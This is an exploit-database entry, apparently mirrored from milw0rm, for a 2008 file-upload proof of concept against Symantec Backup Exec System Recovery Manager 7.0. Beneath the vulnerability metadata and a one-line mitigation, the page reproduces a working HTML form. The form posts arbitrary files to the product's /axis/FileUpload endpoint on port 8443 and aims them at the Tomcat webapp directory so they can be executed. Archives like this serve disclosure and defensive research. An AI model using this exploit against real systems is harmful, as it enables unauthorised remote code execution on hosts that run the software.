header-logo
Suggest Exploit
vendor:
Backup Exec System Recovery Manager
by:
BastardLabs
9.3
CVSS
HIGH
File Upload
434
CWE
Product Name: Backup Exec System Recovery Manager
Affected Version From: 7
Affected Version To: 7
Patch Exists: NO
Related CWE: N/A
CPE: a:symantec:backup_exec_system_recovery_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

File Upload POC

This vulnerability allows remote attackers to upload arbitrary files to the vulnerable application. The vulnerability is due to the application not properly validating the file type of the uploaded file. This can be exploited to upload and execute arbitrary code on the vulnerable system.

Mitigation:

The application should validate the file type of the uploaded file and only allow files of the expected type to be uploaded.
Source

Exploit-DB raw data:

<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
  <head><title>File Upload POC</title></head>
  <body>
    <h2> Backup Exec System Recovery Manager 7.0<br>File Upload POC</h2>
    <form action="https://<TARGET>:8443/axis/FileUpload" method="post"
enctype="multipart/form-data">
      Remote Path: <input name="path" size="100" type="text"
value="C:\Program Files\Symantec\Backup Exec System
Recovery\Manager\Services\tomcat\WebApps\axis"/><br/>
	File to upload: <input name="log_file" type="file"/><br/>
      <hr/>
      <p><input type="submit"/><input type="reset"/></p>
	  </form>
(c)BastardLabs 2008.
  </body>
</html>

# milw0rm.com [2008-02-07]

Navigation

Suggest Exploit

Services By CQR